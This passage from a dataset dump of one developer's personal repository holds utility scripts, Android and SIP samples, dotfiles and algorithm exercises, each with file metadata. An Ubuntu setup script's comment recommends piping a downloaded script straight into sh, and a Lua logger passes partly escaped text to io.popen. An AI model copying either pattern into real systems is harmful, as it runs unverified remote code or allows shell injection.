\\\n\t\tsrc/osip2/port_fifo.c \\\n\t\tsrc/osip2/ist_fsm.c \\\n\t\tsrc/osip2/ist.c \\\n\t\tsrc/osip2/osip_time.c \\\n\t\tsrc/osip2/port_condv.c 
\\\n\t\tsrc/osip2/fsm_misc.c \\\n\t\tsrc/osip2/osip.c \\\n\t\tsrc/osip2/nist_fsm.c\n\nLOCAL_CFLAGS += -DHAVE_FCNTL_H \\\n\t\t\t\t-DHAVE_SYS_TIME_H \\\n\t\t\t\t-DHAVE_STRUCT_TIMEVAL \\\n\t\t\t\t-DHAVE_SYS_SELECT_H \\\n\t\t\t\t-DHAVE_PTHREAD \\\n\t\t\t\t-DHAVE_SEMAPHORE_H \\\n\t\t\t\t-DENABLE_TRACE \\\n\t\t\t\t-DOSIP_MT\n\nLOCAL_C_INCLUDES:= $(LOCAL_PATH)/include $(LOCAL_PATH)/src \nLOCAL_EXPORT_C_INCLUDES:=$(LOCAL_C_INCLUDES)\n\nLOCAL_PRELINK_MODULE := false\n#LOCAL_LDLIBS += -lpthread -ldl\n\nLOCAL_MODULE:= libosip\n\ninclude $(BUILD_SHARED_LIBRARY)\n" }, { "alpha_fraction": 0.6076905727386475, "alphanum_fraction": 0.6100244522094727, "avg_line_length": 38.98666763305664, "blob_id": "bcc5d7f7bc9e18a6fdd940b0c71b820f61e4ddcf", "content_id": "d532b407a626873874886bf0ee94e9bdb476025a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8998, "license_type": "permissive", "max_line_length": 102, "num_lines": 225, "path": "/tools/bcscope.py", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__VERSION__ = '1.4.1'\n__author__ = '[email protected]'\n\nimport subprocess\nimport sys\nimport shutil\nimport os\nfrom optparse import OptionParser\n\nfile_list_name = \"cscope.files\"\ndefault_database_name = \"cscope.out\"\ndefault_database_name_in = \"cscope.in.out\"\ndefault_database_name_po = \"cscope.po.out\"\ndefault_cfg_name = \".bcscope.cfg\"\n\n# parse command line options\nopt_parser = OptionParser(version = \"%prog \" + __VERSION__, \n description = \"command line tool for generating cscope database\",\n usage = \"%prog [-o file] [file type: c++(default)/c#/python/java/ruby]\")\nopt_parser.add_option(\"-o\", \"--output\", dest=\"output_file\", default=default_database_name, \n help=\"cscope database file\")\nopt_parser.add_option(\"-i\", \"--input\", dest=\"input_file\", default=default_cfg_name, \n help=\"cfg file lists all directories to be included or exclued from search\")\nopt_parser.add_option(\"-r\", \"--recursive\", action=\"store_true\", default=False, \n help=\"recursivly include input_file contained in all directories [default: %default]\")\nopt_parser.add_option(\"-v\", \"--verbose\", action=\"store_true\", default=False, \n help=\"verbose output [default: %default]\")\nopt_parser.add_option(\"-a\", \"--absolute\", action=\"store_true\", default=False, \n help=\"generate cscope database with absolute path [default: %default]\")\nopt_parser.add_option(\"-k\", \"--kernel\", action=\"store_true\", default=False, \n help=\"Kernel Mode - don't use /usr/include for #include files. [default: %default]\")\nopt_parser.add_option(\"-q\", \"--quick\", action=\"store_true\", default=False, \n help=\"Build an inverted index for quick symbol searching. 
[default: %default]\")\nopt_parser.add_option(\"-c\", \"--confirm\", action=\"store_false\", default=True, \n help=\"confirm overwrite existing cscope database without interaction [default: %default]\")\nopt_parser.add_option(\"-p\", \"--preserve-filelist\", action=\"store_true\", default=False, \n help=\"don't delete cscope.files after the database has been generated [default: %default]\")\nopt_parser.add_option(\"\", \"--include-dir\", default=None, action=\"append\",\n help=\"additional directories to be included in search, can be specified multiple times\")\nopt_parser.add_option(\"\", \"--exclude-dir\", default=None, action=\"append\",\n help=\"additional directories to be exclued from search, can be specified multiple times\")\nopt_parser.add_option(\"\", \"--exclude\", default=None, action=\"append\",\n help=\"file pattern (regular expression) to be excluded, can be specified multiple times\")\nopt_parser.add_option(\"-t\", \"--ctags\", action=\"store_true\", default=False, \n help=\"generate ctags database as well [default: %default]\")\nopt_parser.add_option(\"-g\", \"--gtags\", action=\"store_true\", default=False, \n help=\"generate gtags database as well [default: %default]\")\n(cmdline_options, args) = opt_parser.parse_args()\n\n# config application behavior\nvalid_lan_types = {\"c++\": \"cpp\\|c\\|cxx\\|cc\\|h\\|hpp\\|hxx\",\n \"java\": \"java\",\n \"c#\": \"cs\",\n \"python\": \"py\",\n \"ruby\": \"rb\",\n \"js\": \"js\"}\nlan_type = ''\nif len(args) == 0:\n# no language specified, default to c++\n args = ['c++']\n\nlan_pattern = ''\nfor arg in args:\n lan_type += arg + ' '\n if valid_lan_types.has_key(arg):\n if len(lan_pattern) > 0:\n lan_pattern += '\\|'\n lan_pattern += valid_lan_types[arg]\n else:\n print \"invalid language type: \" + arg \n print \"must be one of:\"\n for (k, v) in valid_lan_types.items():\n print \"\\t\" + k\n sys.exit(-1)\nlan_pattern = '.+\\.\\(' + lan_pattern + '\\)$'\n\n# take care of accidently overwrite existing database file\nif not cmdline_options.confirm:\n confirm = 'n'\n if default_database_name != cmdline_options.output_file and os.path.isfile(default_database_name):\n confirm = raw_input(default_database_name + \" already exists, overwrite it? (y/n)\")\n if confirm != \"y\":\n sys.exit(0)\n if os.path.isfile(cmdline_options.output_file):\n confirm = raw_input(cmdline_options.output_file + \" already exists, overwrite it? 
(y/n)\")\n if confirm != \"y\":\n sys.exit(0)\n\nfile_list = open(file_list_name, \"w\")\n# should we check more directories?\ndirs = []\nexcluded_dirs = []\n\nif cmdline_options.include_dir:\n dirs.extend(cmdline_options.include_dir)\nif cmdline_options.exclude_dir:\n excluded_dirs.extend(cmdline_options.exclude_dir)\n\ndef convert_path(p):\n if cmdline_options.absolute:\n return os.path.abspath(p)\n else:\n return os.path.relpath(p)\n\ndef include_dirs_from_cfg(dir_path, cfg_name):\n cfg_file = os.path.join(dir_path, cfg_name)\n if os.path.isfile(cfg_file):\n if cmdline_options.verbose:\n print \"read configuration file from \" + cfg_file\n f = open(cfg_file)\n for line in f:\n line = line.strip() # remove possible \\n char\n if len(line) > 0 and not line.startswith(\"#\"):\n include = True\n if line.startswith(\"!\"):\n include = False\n line = line[1:]\n\n line = os.path.expanduser(line)\n if not os.path.isabs(line):\n # the line is relative to dir_path, join them so line is relative to current dir\n line = os.path.join(dir_path, line)\n line = convert_path(line)\n if include:\n search_dirs = dirs\n else:\n search_dirs = excluded_dirs\n if os.path.isdir(line):\n if search_dirs.count(line) == 0:\n search_dirs.append(line)\n elif cmdline_options.verbose:\n print line + \" is not a directory, omit it\"\n f.close()\n\ninclude_dirs_from_cfg(\"./\", cmdline_options.input_file)\n\n# find source files in all directories\ndef find_files(d, pattern, file_list):\n import re\n source_files = []\n for (root, subdirs, files) in os.walk(d, followlinks=True):\n for f in files:\n fpath = os.path.join(root, f)\n if re.match(pattern, fpath):\n # check if the file matches exclude_pattern\n should_exclude = False\n if cmdline_options.exclude:\n for exclude_pattern in cmdline_options.exclude:\n if re.match(exclude_pattern, fpath):\n should_exclude = True\n if cmdline_options.verbose:\n print \"exclude \" + fpath\n break\n if not should_exclude:\n # get real path of symbolic link\n # cscope can't deal with symbolic link\n fpath = convert_path(os.path.realpath(fpath))\n source_files.append(fpath + \"\\n\")\n i = 0\n while i < len(subdirs):\n d = subdirs[i]\n fpath = convert_path(os.path.join(root, d))\n if excluded_dirs.count(fpath) > 0:\n subdirs.remove(d)\n else:\n i += 1\n \n file_list.writelines(source_files)\n\nif cmdline_options.recursive:\n# include cfg files in other directories\n for d in dirs:\n include_dirs_from_cfg(d, cmdline_options.input_file)\n\n# make sure current directory is included\nif dirs.count(\".\") + dirs.count(\"./\") < 1:\n dirs.insert(0, \".\")\n\nj = 0\nfor d in dirs:\n dirs[j] = convert_path(d)\n j += 1\n\nj = 0\nfor d in excluded_dirs:\n excluded_dirs[j] = convert_path(d)\n j += 1\n\nfor d in dirs:\n print \"find \" + lan_type + \"source files in \" + d\n # change lan_pattern so that it works on python\n lan_pattern = lan_pattern.replace(\"\\(\", \"(\").replace(\"\\)\", \")\").replace(\"\\|\", \"|\")\n find_files(d, lan_pattern, file_list)\nfile_list.close()\n\n# actually generate database\nprint \"build cscope database\"\ncmd = [\"cscope\", \"-b\"]\nif cmdline_options.quick:\n cmd.append(\"-q\")\nif cmdline_options.kernel:\n cmd.append(\"-k\")\nsubprocess.Popen(cmd).wait()\nif cmdline_options.output_file != default_database_name:\n shutil.move(default_database_name, cmdline_options.output_file)\n if os.path.isfile(default_database_name_in):\n shutil.move(default_database_name_in, cmdline_options.output_file+\".in\")\n if os.path.isfile(default_database_name_po):\n 
shutil.move(default_database_name_po, cmdline_options.output_file+\".po\")\nprint \"done, cscope database saved in \" + cmdline_options.output_file\nif cmdline_options.ctags:\n print \"build ctags database\"\n cmd = [\"ctags\", \"-L\", file_list_name, \"--fields=l\"]\n subprocess.Popen(cmd).wait()\n print \"done, ctags database saved in tags\"\nif cmdline_options.gtags:\n print \"build gtags database\"\n cmd = [\"gtags\", \"-f\", file_list_name]\n subprocess.Popen(cmd).wait()\n print \"done, gtags database saved in GTAGS\"\nif not cmdline_options.preserve_filelist:\n os.remove(file_list_name)\n\n" }, { "alpha_fraction": 0.45261919498443604, "alphanum_fraction": 0.474985271692276, "avg_line_length": 25.96825408935547, "blob_id": "c43842967a96cf39c4c9aef1db55ff2ef91160be", "content_id": "349361ec8324c71f7a67abccf9c18cd9cea0aed7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1699, "license_type": "permissive", "max_line_length": 104, "num_lines": 63, "path": "/android/exosip_sample/sip_exe/jni/sipexe.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: sipexe.cpp\n// \n// Description: \n// \n// Version: 1.0\n// Created: 12/10/2010 07:38:57 PM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n#include\t<unistd.h>\n#include\t<android/log.h>\n#include\t<netinet/in.h>\n#include <eXosip2/eXosip.h>\n#include <iostream>\n#include\t<complex>\n\nconst char* const LOG_TAG = \"SIP_EXE\";\n\nstatic void android_trace_func(char *fi, int li, osip_trace_level_t level, char *chfr, va_list ap)\n{\n __android_log_vprint(ANDROID_LOG_VERBOSE, LOG_TAG, chfr, ap);\n}\n\nint main ( int argc, char *argv[] )\n{\n int i, port = 5060;\n osip_trace_initialize_func(END_TRACE_LEVEL, &android_trace_func);\n i=eXosip_init();\n if (i!=0)\n return -1;\n i = eXosip_listen_addr (IPPROTO_UDP, NULL, port, AF_INET, 0);\n if (i!=0)\n {\n eXosip_quit();\n __android_log_print(ANDROID_LOG_ERROR, LOG_TAG, \"%s\", \"could not initialize transport layer\\n\");\n return -1;\n }\n\n eXosip_event_t *je;\n for (;;)\n {\n je = eXosip_event_wait (0, 24*60*60*1000);\n eXosip_lock();\n eXosip_automatic_action ();\n eXosip_unlock();\n if (je == NULL)\n break;\n if (je->type == EXOSIP_CALL_INVITE)\n {\n __android_log_print(ANDROID_LOG_DEBUG, LOG_TAG, \"%s\", \"incoming call\\n\");\n std::cout << \"incoming call\" << std::endl;\n }\n }\n\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.7391546368598938, "alphanum_fraction": 0.7513904571533203, "avg_line_length": 58.93333435058594, "blob_id": "b84850114993f9bf1a1baee01d484d4c6de61735", "content_id": "561f727b1c4985a2314fe451cabacf2124c0d52f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1798, "license_type": "permissive", "max_line_length": 484, "num_lines": 30, "path": "/settings/install_ubuntu_tools.sh", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# run this script as root, sudo su -l\n\narray=(sysstat apt-file ipset htop dsniff iftop openssh-server awesome awesome-extra gnome-settings-daemon realpath socat proxychains gpick gnupg2 silversearcher-ag shutter parcellite zsh mpg123 ncurses-dev p7zip 
tofrodos check g++ cppcheck mercurial git-core git-extras gitk tig git-svn valgrind cgdb python-pip wireshark nmap vim-gnome ctags cscope expect flex doxygen graphviz pandoc goldendict sdcv dmenu manpages-posix-dev clang libclang-dev astyle global libc6-dev-i386 autossh)\n\nlen=${#array[*]}\ni=0\nwhile [ $i -lt $len ]; do\n echo \"sudo apt-get install -y ${array[$i]}\"\n sudo apt-get install -y ${array[$i]}\n let i++\n done\n\n# add my account to docker group to avoid having to run docker as root: sudo usermod -a -G docker current_user_name\n# change docker run time root dir: sudo ln -s /home/raymond/projects/docker/runtime_root /var/lib/docker\n# the docker.io/docker in ubuntu repository isn't maintained by docker team and it's out of date,\n# it's recommended to use this command to install docker: wget -qO- https://get.docker.com/ | sh\n\n# for chinese input, user fcitx-googlepinyin\n# add zsh-completion & zsh-syntax-highlighter plugins for on-my-zsh (place in ~/.oh-my-zsh/custom/plugins/)\ngit clone https://github.com/zsh-users/zsh-autosuggestions ~/.oh-my-zsh/custom/plugins/zsh-autosuggestions\ngit clone https://github.com/zsh-users/zsh-syntax-highlighting ~/.oh-my-zsh/custom/plugins/zsh-syntax-highlighting\nwget https://raw.githubusercontent.com/clvv/fasd/master/fasd\n\n# for serial port accessing, install ckermit\n# create \"KERNEL==\"ttyUSB*\", MODE=\"0666\" rule in /etc/udev/rules.d/50-usb-tty.rules, then use kermit -l /dev/ttyUSB* -b 115200 to access\n\n# additional tools\n# smplayer gnome-applets\n" }, { "alpha_fraction": 0.52173912525177, "alphanum_fraction": 0.5286040902137756, "avg_line_length": 14.607142448425293, "blob_id": "a3c5f6345a4a0ddddd9ca519736360328f38c82d", "content_id": "3dc2a31fe9d0c8c1702cbd24e100162aa6f09c83", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 437, "license_type": "permissive", "max_line_length": 94, "num_lines": 28, "path": "/settings/ubuntu_home/etc_init.d_shadowsocks", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\n# use sudo update-rc.d shadowsocks defaults command to start shadowsocks service automatically\n\nstart(){\n sslocal -c /opt/shadowsocks.json -d start\n}\n\nstop(){\n sslocal -c /opt/shadowsocks.json -d stop\n}\n\ncase \"$1\" in\n start)\n start\n ;;\n stop)\n stop\n ;;\n reload)\n stop\n start\n ;;\n *)\n echo \"Usage: $0 {start|reload|stop}\"\n exit 1\n ;;\nesac\n" }, { "alpha_fraction": 0.6103004217147827, "alphanum_fraction": 0.6111587882041931, "avg_line_length": 30.81690216064453, "blob_id": "23187d902eb65e89ba9e475b2b21e6c0802a924e", "content_id": "bfc35ef31f8bbf2d73c733fd83c3c842f408a572", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2330, "license_type": "permissive", "max_line_length": 94, "num_lines": 71, "path": "/android/mplayer/src/com/rmd/mplayer/VideoSelector.java", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "package com.rmd.mplayer;\r\n\r\nimport android.app.ListActivity;\r\nimport android.content.ContentResolver;\r\nimport android.content.Intent;\r\nimport android.database.Cursor;\r\nimport android.os.Bundle;\r\nimport android.provider.MediaStore;\r\nimport android.view.View;\r\nimport android.widget.ListView;\r\nimport android.widget.SimpleCursorAdapter;\r\n\r\npublic class VideoSelector extends ListActivity {\r\n\r\n public static final String FILE_PATH = \"FILE_PATH\";\t\r\n public void onCreate(Bundle 
icicle)\r\n {\r\n super.onCreate(icicle);\r\n init();\r\n }\r\n\r\n public void init() {\r\n setContentView(R.layout.video_selector);\r\n\r\n MakeCursor();\r\n\r\n // Map Cursor columns to views defined in media_list_item.xml\r\n SimpleCursorAdapter adapter = new SimpleCursorAdapter(\r\n this,\r\n android.R.layout.simple_list_item_1,\r\n mCursor,\r\n new String[] { MediaStore.Video.Media.TITLE},\r\n new int[] { android.R.id.text1 });\r\n\r\n setListAdapter(adapter);\r\n }\r\n\r\n @Override\r\n protected void onListItemClick(ListView l, View v, int position, long id)\r\n {\r\n \tString filePath = mCursor.getString(mCursor.getColumnIndex(MediaStore.Video.Media.DATA));\r\n mCursor.moveToPosition(position);\r\n Intent result = new Intent();\r\n\t\tresult.putExtra(FILE_PATH, filePath);\r\n setResult(RESULT_OK, result);\r\n finish();\r\n }\r\n\r\n private void MakeCursor() {\r\n String[] cols = new String[] {\r\n MediaStore.Video.Media._ID,\r\n MediaStore.Video.Media.TITLE,\r\n MediaStore.Video.Media.DATA,\r\n MediaStore.Video.Media.MIME_TYPE,\r\n MediaStore.Video.Media.ARTIST\r\n };\r\n ContentResolver resolver = getContentResolver();\r\n if (resolver == null) {\r\n System.out.println(\"resolver = null\");\r\n } else {\r\n mSortOrder = MediaStore.Video.Media.TITLE + \" COLLATE UNICODE\";\r\n mWhereClause = MediaStore.Video.Media.TITLE + \" != ''\";\r\n mCursor = resolver.query(MediaStore.Video.Media.EXTERNAL_CONTENT_URI,\r\n cols, mWhereClause , null, mSortOrder);\r\n }\r\n }\r\n\r\n private Cursor mCursor;\r\n private String mWhereClause;\r\n private String mSortOrder;\r\n}\r\n" }, { "alpha_fraction": 0.6323278546333313, "alphanum_fraction": 0.6476949453353882, "avg_line_length": 24.449275970458984, "blob_id": "0011cd6074c6dd34c45dec67ca9f432ba8e36a1d", "content_id": "65cb20a106cdd0f2ee0397e335d15f7660a04241", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1757, "license_type": "permissive", "max_line_length": 75, "num_lines": 69, "path": "/android/adb/framebuffer_service.c", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n * Copyright (C) 2007 The Android Open Source Project\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\n#include <stdlib.h>\n#include <stdio.h>\n#include <unistd.h>\n#include <string.h>\n#include <fcntl.h>\n\n#include \"fdevent.h\"\n#include \"adb.h\"\n\n#include <linux/fb.h>\n#include <sys/ioctl.h>\n#include <sys/mman.h>\n\n/* TODO:\n** - grab the current buffer, not the first buffer\n** - sync with vsync to avoid tearing\n*/\n\nvoid framebuffer_service(int fd, void *cookie)\n{\n struct fb_var_screeninfo vinfo;\n int fb;\n void *ptr = MAP_FAILED;\n char x;\n\n unsigned fbinfo[4];\n\n fb = open(\"/dev/graphics/fb0\", O_RDONLY);\n if(fb < 0) goto done;\n\n if(ioctl(fb, FBIOGET_VSCREENINFO, &vinfo) < 0) goto done;\n fcntl(fb, F_SETFD, FD_CLOEXEC);\n\n fbinfo[0] = 16;\n fbinfo[1] = vinfo.xres * vinfo.yres * 2;\n fbinfo[2] = vinfo.xres;\n fbinfo[3] = 
vinfo.yres;\n\n ptr = mmap(0, fbinfo[1], PROT_READ, MAP_SHARED, fb, 0);\n if(ptr == MAP_FAILED) goto done;\n\n if(writex(fd, fbinfo, sizeof(unsigned) * 4)) goto done;\n\n for(;;) {\n if(readx(fd, &x, 1)) goto done;\n if(writex(fd, ptr, fbinfo[1])) goto done;\n }\n\ndone:\n if(ptr != MAP_FAILED) munmap(ptr, fbinfo[1]);\n if(fb >= 0) close(fb);\n close(fd);\n}\n\n" }, { "alpha_fraction": 0.8286778330802917, "alphanum_fraction": 0.8379888534545898, "avg_line_length": 75.71428680419922, "blob_id": "6abb5317fe0e15528b588d71faf91a56dc0a5277", "content_id": "0a97041e933c3877a544765969046e035103068b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 537, "license_type": "permissive", "max_line_length": 377, "num_lines": 7, "path": "/settings/osx_brew_tools.md", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "brew install\niproute2mac md5sha1sum zsh python ctags cscope gpg git git-extras tig tmux nmap doxygen graphviz astyle clang-format pandoc iftop p7zip unrar tofrodos jq ag ripgrep progress proxychains-ng mycli autoconf automake libtool plantuml docker docker-compose docker-machine platformio httpie polipo autossh cmake socat jsonlint cppchek flake8 shellcheck dive ctop grv jid annie vegeta\n\n# srecord\n# reattach-to-user-namespace --wrap-pbcopy-and-pbpaste\nbrew cask install\nwireshark java mactex ngrok macvim --with-override-system-vim\n" }, { "alpha_fraction": 0.6179487109184265, "alphanum_fraction": 0.6179487109184265, "avg_line_length": 7.8481011390686035, "blob_id": "fa28286384db09f04d7a29a701116d29df187da4", "content_id": "8fe21dfb254a05cef23678d5f9de5441e337ab49", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 780, "license_type": "permissive", "max_line_length": 15, "num_lines": 79, "path": "/settings/totalcmd/usercmd.ini", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "[em_GotoDriveG]\r\nbutton=\r\ncmd=cd g:\r\n\r\n[em_GotoDriveH]\r\nbutton=\r\ncmd=cd H:\r\n\r\n[em_GotoDriveI]\r\nbutton=\r\ncmd=cd I:\r\n\r\n[em_GotoDriveJ]\r\nbutton=\r\ncmd=cd J:\r\n\r\n[em_GotoDriveK]\r\nbutton=\r\ncmd=cd K:\r\n\r\n[em_GotoDriveL]\r\nbutton=\r\ncmd=cd L:\r\n\r\n[em_GotoDriveM]\r\nbutton=\r\ncmd=cd M:\r\n\r\n[em_GotoDriveN]\r\nbutton=\r\ncmd=cd N:\r\n\r\n[em_GotoDriveO]\r\nbutton=\r\ncmd=cd O:\r\n\r\n[em_GotoDriveP]\r\nbutton=\r\ncmd=cd P:\r\n\r\n[em_GotoDriveQ]\r\nbutton=\r\ncmd=cd Q:\r\n\r\n[em_GotoDriveR]\r\nbutton=\r\ncmd=cd R:\r\n\r\n[em_GotoDriveS]\r\nbutton=\r\ncmd=cd S:\r\n\r\n[em_GotoDriveT]\r\nbutton=\r\ncmd=cd T:\r\n\r\n[em_GotoDriveU]\r\nbutton=\r\ncmd=cd U:\r\n\r\n[em_GotoDriveV]\r\nbutton=\r\ncmd=cd V:\r\n\r\n[em_GotoDriveW]\r\nbutton=\r\ncmd=cd W:\r\n\r\n[em_GotoDriveX]\r\nbutton=\r\ncmd=cd X:\r\n\r\n[em_GotoDriveY]\r\nbutton=\r\ncmd=cd Y:\r\n\r\n[em_StartBash]\r\nbutton=\r\ncmd=mintty\r\n\r\n" }, { "alpha_fraction": 0.5307443141937256, "alphanum_fraction": 0.5307443141937256, "avg_line_length": 21.769229888916016, "blob_id": "d8386fb8f03d94a623cf422fa3a26022fc98c169", "content_id": "044b5a6c9fb8bcca01d6c1da853f7015777deb76", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 309, "license_type": "permissive", "max_line_length": 78, "num_lines": 13, "path": "/wince/ce_profiling/profiling_lib/profile_func.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "#include \"stdafx.h\"\r\n\r\nextern \"C\" 
\r\n{\r\n void _CAP_Enter_Function(void *p) \r\n {\r\n printf(\"Enter function (at address %p) at %d\\n\", p, GetTickCount());\r\n }\r\n void _CAP_Exit_Function(void *p) \r\n {\r\n printf(\"Leaving function (at address %p) at %d\\n\", p, GetTickCount());\r\n }\r\n}\r\n" }, { "alpha_fraction": 0.5596491098403931, "alphanum_fraction": 0.5631579160690308, "avg_line_length": 32.52941131591797, "blob_id": "b0430b7baea171b82491b3ef37ea6fb50d35bf03", "content_id": "7f1d534f79bca78485278fcded63bc7ff106cc99", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Lua", "length_bytes": 570, "license_type": "permissive", "max_line_length": 73, "num_lines": 17, "path": "/settings/ubuntu_home/awesome/logger.lua", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "enable_debug = true\nfunction debug_message(msg,title,log_type)\n if not enable_debug then\n return\n end\n log_type = log_type or \"notify-send\"\n title = title or \"awesome_debugging\"\n if log_type == \"syslog\" then\n io.popen('printf \"'..string.gsub(msg,'[\"]','\\\\%1')..'\" | logger')\n elseif log_type == \"notify-send\" then\n io.popen('notify-send \"awesome debug\" \"'\n ..string.gsub(msg,'[\"]','\\\\%1')..'\"')\n else\n io.popen('notify-send \"awesome debug\" \"'\n ..log_type..' is not a known log method\"')\n end\nend\n" }, { "alpha_fraction": 0.3145400583744049, "alphanum_fraction": 0.3397625982761383, "avg_line_length": 23.071428298950195, "blob_id": "e4d584075f0da88734e5aa9ef671ee7783262dbb", "content_id": "2d8060936642ea83b5d05f51eabc3d965a6e2fd8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 674, "license_type": "permissive", "max_line_length": 88, "num_lines": 28, "path": "/android/logtest/logtest.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\n// \n// Filename: logtest.cpp\n// \n// Description: \n// \n// Version: 1.0\n// Created: 02/01/2010 02:22:56 PM\n// Revision: none\n// Compiler: g++\n// \n// Author: Raymond Wen (), \n// Company: \n// \n// =====================================================================================\n\n\n#include\t\"cutils/log.h\"\n\nint main ( int argc, char *argv[] )\n{\n LOGE(\"log ERROR\");\n LOGW(\"log WARN\");\n LOGD(\"log DEBUG\");\n LOGI(\"log INFORMATION\");\n LOGV(\"log VERBOSE\");\n return 0;\n}\t\t\t\t// ---------- end of function main ----------\n" }, { "alpha_fraction": 0.41508620977401733, "alphanum_fraction": 0.4375, "avg_line_length": 26.951807022094727, "blob_id": "9236aa151d73a1ea91317f3a7f819a7bcea22667", "content_id": "de708fd1dbf70c4071ccd09f17a54795bdaa7581", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2320, "license_type": "permissive", "max_line_length": 177, "num_lines": 83, "path": "/algorithm/leetcode/5_longest_palindromic_substring.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "/*\n * http://leetcode.com/onlinejudge#question_5\n *\n * Longest Palindromic SubstringNov 11 '114008 / 13367\n *\n * Given a string S, find the longest palindromic substring in S. 
You may assume that the maximum length of S is 1000, and there exists one unique longest palindromic substring.\n *\n */\n\n#include <iostream>\n#include <string>\n\nusing namespace std;\nclass Solution {\n public:\n enum { MAXLEN = 1000 };\n Solution() {\n for(int i = 0; i < MAXLEN; ++i)\n for(int j = 0; j < MAXLEN; ++j)\n matrix[i][j] = -1;\n }\n\n string longestPalindrome(string s) {\n // initialization\n for(int i = 0; i < s.length(); ++i) {\n matrix[i][i] = true;\n matrix[0][i] = isPalindromicString(s, 0, i);\n }\n\n for(int i = 1; i < s.length()-1; ++i) {\n for(int j = i+1; j < s.length(); ++j) {\n if(matrix[i][j] != -1)\n continue;\n isPalindromicString_dp(s, i, j);\n }\n }\n\n // find longest string\n for(int len = s.length(); len > 0; --len) {\n for(int i = 0, j = len - i - 1; i <= s.length()-len; ++i, ++j) {\n if(matrix[i][j]) {\n return s.substr(i, j-i+1);\n }\n }\n }\n return s;\n }\n\n\n private:\n\n // the matrix is used for recording if str[i~j] is palindromic\n int matrix[MAXLEN][MAXLEN];\n\n void isPalindromicString_dp(string s, int i, int j) {\n if((i+1<=j-1) && matrix[i+1][j-1] == -1)\n isPalindromicString_dp(s, i+1, j-1);\n if((i+1>j-1 || matrix[i+1][j-1]) && s[i] == s[j])\n matrix[i][j] = 1;\n else\n matrix[i][j] = 0;\n }\n\n int isPalindromicString(string s, int start, int end) {\n while(end > start) {\n if(s[end] != s[start]) \n return 0;\n\n --end;\n ++start;\n }\n return 1;\n }\n\n};\n\nint main(int argc, const char *argv[]) {\n Solution slu;\n string s(\"banana\");\n cout << slu.longestPalindrome(s) << endl;\n //cout << s << endl;\n return 0;\n}\n" }, { "alpha_fraction": 0.4265536665916443, "alphanum_fraction": 0.4403640925884247, "avg_line_length": 22.697673797607422, "blob_id": "5b14bf402966ffe7f783104f8539a9d38af739fd", "content_id": "775922dd3d27774453e23ccbea3500035d96967e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3186, "license_type": "permissive", "max_line_length": 88, "num_lines": 129, "path": "/algorithm/i2a_ex_9.3-9/ex9_3_9.cpp", "repo_name": "fairyhunter13/rxwen-blog-stuff", "src_encoding": "UTF-8", "text": "// =====================================================================================\r\n// \r\n// Filename: 9_3_9.cpp\r\n// \r\n// Description: solution to exercise 9.3-9 of Introduction to algorithms\r\n// \r\n// Version: 1.0\r\n// Created: 12/14/2009 8:32:45 PM\r\n// Revision: none\r\n// Compiler: cl.exe\r\n// \r\n// Author: Raymond Wen (), \r\n// Company: \r\n// \r\n// =====================================================================================\r\n\r\n#include\t<time.h>\r\n#include\t<cstdlib>\r\n#include\t<vector>\r\n#include\t<iostream>\r\n#include\t<assert.h>\r\n\r\ntypedef std::vector<int> int_vector;\r\n\r\nvoid printVec (const int_vector& vec);\r\nint random()\r\n{\r\n static int initialized = false;\r\n if(!initialized)\r\n {\r\n srand(static_cast<unsigned int>(time(NULL)));\r\n initialized = true;\r\n }\r\n\r\n return rand();\r\n}\t\t// ---------- end of function random ----------\r\n\r\nvoid swap(int_vector& vec, int i, int j)\r\n{\r\n int temp = vec[i];\r\n vec[i] = vec[j];\r\n 